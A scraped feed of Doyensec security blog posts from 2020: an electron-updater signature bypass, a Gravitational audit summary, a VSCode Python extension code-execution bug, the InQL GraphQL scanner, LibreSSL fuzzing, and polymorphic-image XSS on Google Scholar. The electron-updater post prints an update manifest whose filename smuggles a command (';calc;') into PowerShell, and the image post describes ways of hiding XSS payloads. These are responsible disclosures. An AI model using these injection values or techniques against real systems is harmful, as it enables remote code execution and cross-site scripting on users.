Normal view

There are new articles available, click to refresh the page.
Before yesterdayDoyensec's Blog

Signature Validation Bypass Leading to RCE In Electron-Updater

23 February 2020 at 23:00

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

Electron-Builder repository

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v’ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, they may leverage the lack of escaping to pull out a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

PoC Reproduction of the command injection by using Burp's interception feature

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

On February 15th, 2020, we’ve been made aware that the vulnerability discussed in this blog post was discussed on Twitter. On February 24th, 2020, we’ve been informed by the package’s mantainer that the issue was resolved in release v22.3.5. While the patch is mitigating the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer.

Electron Forge represents a potential well-maintained substitute, which is taking advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since the Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app to the Windows Store or incorporate minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exists in Electron-Builder.

Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

2019 Gravitational Security Audit Results

1 March 2020 at 23:00

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack are immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary, and provide an independent analysis of our sources.

2019 Gravitational Security Audit Results

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here is the full report for Teleport and Gravity; and you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher except for one were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them, and the fourth relies on a significant investment in design and tooling change which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we run into problems. Golang’s tar handling code is extremely basic and this allows very old tar handling problems to surface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.

Remote Code Execution via Malicious Auth Connector

When using our cli tools to do single sign on, we launch a browser for the user to the single sign on page. This was done by passing a url from the server to the client to tell it where the SSO page is located.

Someone with access to the server is able to change the url to be a non http(s) url and execute programs locally on the cli host. We’ve implemented sanitization of the url passed by the server to enforce http(s), and also changed the design of some new features to not require trusting data from a server.

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as it was never a design objective to protect against this particular vulnerability.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publically connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to Github - anyone with the correct access can modify or post malicious assets, and anyone who trusts Github when downloading that asset could be getting a malicious asset. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product as the asset storage functionality is not widely used. We’re also going move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could be only exploited using credentials from a previously authenticated client. There was no known way to exploit this vulnerability outside the cluster by non-authenticated clients.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront with to users and customers. Session recording is a great feature, however due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Don't Clone That Repo: Visual Studio Code^2 Execution

15 March 2020 at 23:00

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.


The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning

VSCode pylint not installed warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

VSCode pylint not installed warning full window screenshot

This seemed sketchy, so I added os.exec("/Applications/Calculator.app") to one of pylint sources and a calculator spawned. Easiest code execution ever!

VSCode behaviour is dangerous since the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If found in the cloned repo, this value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.

The behavior is not in VSCode core, but rather in the Python extension. We contacted Microsoft on the 2nd October 2019, however the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

  • 1) git clone [email protected]:doyensec/VSCode_PoC_Oct2019.git
  • 2) add the cloned repo to the VSCode workspace
  • 3) open test.py in VScode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.

In case of a bare-bone repo like this noticing the virtualenv might be easy, but it’s clear to see how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder by just opening a Python file in the editor.

Disclosure Timeline

  • 2nd Oct 2019: Issue discovered
  • 2nd Oct 2019: Security advisory sent to Microsoft
  • 8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
  • 7th Jan 2020: Asked Microsoft for a resolution timeframe
  • 8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
  • 16th Mar 2020: Doyensec advisory and blog post is published

Edits

  • 17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

InQL Scanner

25 March 2020 at 23:00

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed-up GraphQL security testing efforts. We’re excited to announce that InQL is available on Github.

Doyensec Loves GraphQL

InQL can be used as a stand-alone script, or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages GraphQL built-in introspection query to dump queries, mutations, subscriptions, fields, arguments and retrieve default and custom objects. This information is collected and then processed to construct API endpoints documentation in the form of HTML and JSON schema. InQL is also able to generate query templates for all the known types. The scanner has the ability to identify basic query types and replace them with placeholders that will render the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the template generation by sending those requests to Burp’s Repeater tool
  • Configure the tool by using a custom settings tab

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

  • Download the latest Jython Jar
  • Download the latest version of InQL scanner
  • Start Burp Suite
  • Extender Tab > Options > Python Enviroment > Set the location of Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Extension File > Set the location of inql_burp.py > Next
  • The output window should display the following message: InQL Scanner Started!

In the next future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin functionalities.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed on one of the numerous exposed APIs, e.g anilist.co endpoints:

$ $ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedbacks that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, hence we expect to continue our research efforts in this space. Going forward, we will keep improving detection and make the tool more stable.

This project was made with love in the Doyensec Research island.

LibreSSL and OSS-Fuzz

7 April 2020 at 22:00

The story of a fuzzing integration reward

In my first month at Doyensec I had the opportunity to bring together both my work and my spare time hobbies. I used the 25% research time offered by Doyensec to integrate the LibreSSL library into OSS-Fuzz. LibreSSL is an API compatible replacement for OpenSSL, and after the heartbleed attack, it is considered as a full-fledged replacement of OpenSSL on OpenBSD, macOS and VoidLinux.

OSS-Fuzz Fuzzying Process

Contextually to this research, we were awarded by Google a $10,000 bounty, 100% of which was donated to the Cancer Research Institute. The fuzzer also discovered 14+ new vulnerabilities and four of these were directly related to memory corruption.

In the following paragraphs we will walk through the process of porting a new project over to OSS-Fuzz from following the community provided steps all the way to the actual code porting and we will also show a vulnerability fixed in 136e6c997f476cc65e614e514ac3bf6ee54fc4b4.

commit 136e6c997f476cc65e614e514ac3bf6ee54fc4b4
Author: beck <>
Date:   Sat Mar 23 18:48:15 2019 +0000

    Add range checks to varios ASN1_INTEGER functions to ensure the
    sizes used remain a positive integer. Should address issue
    13799 from oss-fuzz
    ok tb@ jsing@

 src/lib/libcrypto/asn1/a_int.c    | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++---
 src/lib/libcrypto/asn1/tasn_prn.c |  8 ++++++--
 src/lib/libcrypto/bn/bn_lib.c     |  4 +++-
 3 files changed, 62 insertions(+), 6 deletions(-)

The FOSS historician blurry book

As a voidlinux maintainer, I’m a long time LibreSSL user and proponent. LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014 with the goals of modernizing the codebase, improving security, and applying best practice development procedures. The motivation for this kind of fork arose after the discovery of the Heartbleed vulnerability.

LibreSSL’s efforts are aimed at removing code considered useless for the target platforms, removing code smells and including additional secure defaults at the cost of compatibility. The LibreSSL codebase is now nearly 70% the size of OpenSSL (237558 cloc vs 335485 cloc), while implementing a similar API on all the major modern operating systems.

Forking is considered a Bad Thing not merely because it implies a lot of wasted effort in the future, but because forks tend to be accompanied by a great deal of strife and acrimony between the successor groups over issues of legitimacy, succession, and design direction. There is serious social pressure against forking. As a result, major forks (such as the Gnu-Emacs/XEmacs split, the fissioning of the 386BSD group into three daughter projects, and the short-lived GCC/EGCS split) are rare enough that they are remembered individually in hacker folklore.

Eric Raymond Homesteading the Noosphere

The LibreSSL effort was generally well received and it now replaces OpenSSL on OpenBSD, macOS since 10.11 and on many other Linux distributions. In the first few years 6 critical vulnerabilities were found in OpenSSL and none of them affected LibreSSL.

Historically, these kinds of forks tend to spawn competing projects which cannot later exchange code, splitting the potential pool of developers between them. However, the LibreSSL team has largely demonstrated of being able to merge and implement new OpenSSL code and bug fixes, all the while slimming down the original source code and cutting down on rarely used or dangerous features.

OSS-Fuzz Selection

While the development of LibreSSL appears to be a story with an happy ending, the integration of fuzzing and security auditing into the project was much less so. The Heartbleed vulnerability was like a wakeup call to the industry for tackling the security of libraries that make up the core of the internet. In particular, Google opened up OSS-Fuzz project. OSS-Fuzz is an effort to provide, for free, Google infrastructure to perform fuzzing against the most popular open source libraries. One of the first projects performing these tests was in fact Openssl.

OSS-Fuzz Fuzzying Process

Fuzz testing is a well-known technique for uncovering programming errors in software. Many of these detectable errors, like buffer overflows, can have serious security implications. OpenSSL included fuzzers in c38bb72797916f2a0ab9906aad29162ca8d53546 and was integrated into OSS-Fuzz later in 2016.

commit c38bb72797916f2a0ab9906aad29162ca8d53546
Refs: OpenSSL_1_1_0-pre5-217-gc38bb72797
Author:     Ben Laurie <[email protected]>
AuthorDate: Sat Mar 26 17:19:14 2016 +0000
Commit:     Ben Laurie <[email protected]>
CommitDate: Sat May 7 18:13:54 2016 +0100
    Add fuzzing!

Since both LibreSSL and OpenSSL share most of their codebase, with LibreSSL mainly implementing a secure subset of OpenSSL, we thought porting the OpenSSL fuzzers to LibreSSL would have been a fun and useful project. Moreover, this resulted in the discovery of several memory related corruption bugs.

To be noted, the following details won’t replace the official OSS-Fuzz guide but will instead help in selecting a good target project for OSS-Fuzz integration. Generally speaking applying for a new OSS-Fuzz integration proceeds in four logical steps:

  • Selection: Select a new project that isn’t yet ported. Check for existing projects in OSS-Fuzz projects directory. For example, check if somebody already tried to perform the same integration in a pull-request.
  • Feasibility: Check the feasibility and the security implications of that project on the Internet. As a general guideline, the more impact the project has on the everyday usage of the web the bigger the bounty will be. At the time of writing, OSS-Fuzz bounties are up to $20,000 with the Google patch-reward program. On the other hand, good coverage is expected to be developed for any integration. For this reason it is easier to integrate projects that already employ fuzzers.
  • Technical integration: Follow the super detailed getting started guide to perform an initial integration.
  • Profit: Apply for the Google patch-reward program. Profit?!

We were awarded a bounty, and we helped to protect the Internet just a little bit more. You should do it too!

Heartbreak

After a crash was found, OSS-Fuzz infrastructure provides a minimized test case which can be inspected by an analyst. The issue was found in the ASN1 parser. ASN1 is a formal notation used for describing data transmitted by telecommunications protocols, regardless of language implementation and physical representation of these data, whether complex or very simple. Coincidentally, it is employed for x.509 certificates, which represents the technical base for building public-key infrastructure.

Passing our testcase 0202 ff25 through dumpasn1 it’s possible to see how it errors out saying that the integer of length 2 (bytes) is encoded with a negative value. This is not allowed in ASN1, and it should not even be allowed in LibreSSL. However, as discovered by OSS-Fuzz, this test crashes the Libressl parser.

$ xxd ./test
xxd ../test
00000000: 0202 ff25                                ...%
$ dumpasn1 ./test
  0   2: INTEGER 65317
       :   Error: Integer is encoded as a negative value.

0 warnings, 1 error.

Since the LibreSSL implementation was not guarded against negative integers, trying to covert the ASN1 integer crafted a negative to an internal representation of BIGNUM and causes an uncontrolled over-read.

AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x00000058a308 bp 0x7ffd3e8b7bb0 sp 0x7ffd3e8b7b40 T0)
    ==1==The signal is caused by a READ memory access.
    SCARINESS: 20 (wild-addr-read)
        #0 0x58a307 in BN_bin2bn libressl/crypto/bn/bn_lib.c:601:19
        #1 0x6cd5ac in ASN1_INTEGER_to_BN libressl/crypto/asn1/a_int.c:456:13
        #2 0x6a39dd in i2s_ASN1_INTEGER libressl/crypto/x509v3/v3_utl.c:175:16
        #3 0x571827 in asn1_print_integer_ctx libressl/crypto/asn1/tasn_prn.c:457:6
        #4 0x571827 in asn1_primitive_print libressl/crypto/asn1/tasn_prn.c:556
        #5 0x571827 in asn1_item_print_ctx libressl/crypto/asn1/tasn_prn.c:239
        #6 0x57069a in ASN1_item_print libressl/crypto/asn1/tasn_prn.c:195:9
        #7 0x4f4db0 in FuzzerTestOneInput libressl.fuzzers/asn1.c:282:13
        #8 0x7fd3f5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/libfuzzer/FuzzerLoop.cpp:529:15
        #9 0x7bd746 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/libfuzzer/FuzzerDriver.cpp:286:6
        #10 0x7c9273 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/libfuzzer/FuzzerDriver.cpp:715:9
        #11 0x7bcdbc in main /src/libfuzzer/FuzzerMain.cpp:19:10
        #12 0x7fa873b8282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
        #13 0x41db18 in _start

This “wild” address read may be employed by malicious actors to perform leaks in security sensitive context. The Libressl maintainers team not only addressed the vulnerability promptly but also included an ulterior protection in order to guard against missing ASN1_PRIMITIVE_FUNCS in 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9.

commit 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9
Author: jsing <>
Date:   Mon Apr 1 15:48:04 2019 +0000

    Require all ASN1_PRIMITIVE_FUNCS functions to be provided.

    If an ASN.1 item provides its own ASN1_PRIMITIVE_FUNCS functions, require
    all functions to be provided (currently excluding prim_clear). This avoids
    situations such as having a custom allocator that returns a specific struct
    but then is then printed using the default primative print functions, which
    interpret the memory as a different struct.

Closing the door to strangers

Fuzzing, despite being seen as one of the easiest ways to discover security vulnerabilities, still works very well. Even if OSS-Fuzz is especially tailored to open source projects, it can also be adapted to closed source projects. In fact, at the cost of implementing the LLVMFuzzerOneInput interface, it integrates all the latest and greatest clang/llvm fuzzer technology. As Dockerfile language improves enormously on the devops side, we strongly believe that the OSS-Fuzz fuzzing interface definition language should be employed in every non-trivial closed source project too. If you need help, contact us for your security automation projects!

As always, this research was funded thanks to the 25% research time offered at Doyensec. Tune in again for new episodes!

Researching Polymorphic Images for XSS on Google Scholar

29 April 2020 at 22:00

A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

Google Scholar's design pattern

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When reporting the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all past “well-known” techniques to generate polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular libraries for image processing (i.e. Imagemagick, GraphicsMagick, Libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or Javascript content to bypass “self” CSP directives.

Payload in EXIF

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. Exiftool is a popular tool to edit those entries, but you may find that in some cases the characters will get entity-escaped, so I resorted to inserting them manually. In the hope of Google’s Scholar preserving some whitelisted EXIFs, I created an image having 1.2k common EXIF tags, including CIPA standard and non-standard tags.

JPG having the plain XSS alert() payload in every common metadata field PNG having the plain XSS alert() payload in every common metadata field

While that didn’t work in my case, some of the EXIF entries are to this day kept in many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while they are always lost from PNG to JPG.

Payload concatenated at the end of the image (after 0xFFD9 for JPGs or IEND for PNGs)

This technique will only work if no transformations are performed on the uploaded image, since only the image content is processed.

JPG having the plain XSS alert() payload after the trailing 0xFFD9 chunk PNG having the plain XSS alert() payload after the trailing IEND chunk

As the name suggests, the trick involves appending the JavaScript payload at the end of the image format.

Payload in PNG’s iDAT

In PNGs, the iDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the iDAT chunks or you may try to bypass the resize and re-sampling operations. Google’s Scholar only generated JPG pictures so I could not leverage this technique.

Payload in JPG’s ECS

In the JFIF standard, the entropy-coded data segment (ECS) contains the output of the raw Huffman-compressed bitstream which represents the Minimum Coded Unit (MCU) that comprises the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though having the payload positioned at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

Hexadecimal view of the JFIF structure, with the payload visible in the ECS section

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents were not tolerating low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on Github as doyensec/StandardizedImageProcessingTest.

Exploitation result of the XSS PoC on Scholar

Timeline

  • [2019-09-28] Reported to Google VRP
  • [2019-09-30] Google’s VRP requested a PoC
  • [2019-10-04] Provided PoC #1
  • [2019-10-10] Google’s VRP requested a different payload for PoC
  • [2019-10-11] Provided PoC #2
  • [2019-11-05] Google’s VRP confirmed the issue in 2 endpoints, rewarded $6267.40
  • [2019-11-19] Google’s VRP found another XSS using the same technique, rewarded an additional $3133.70

Fuzzing TLS certificates from their ASN.1 grammar

13 May 2020 at 22:00

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

What is a TLS certificate?

A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, let’s take it one piece at a time.

ASN.1

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

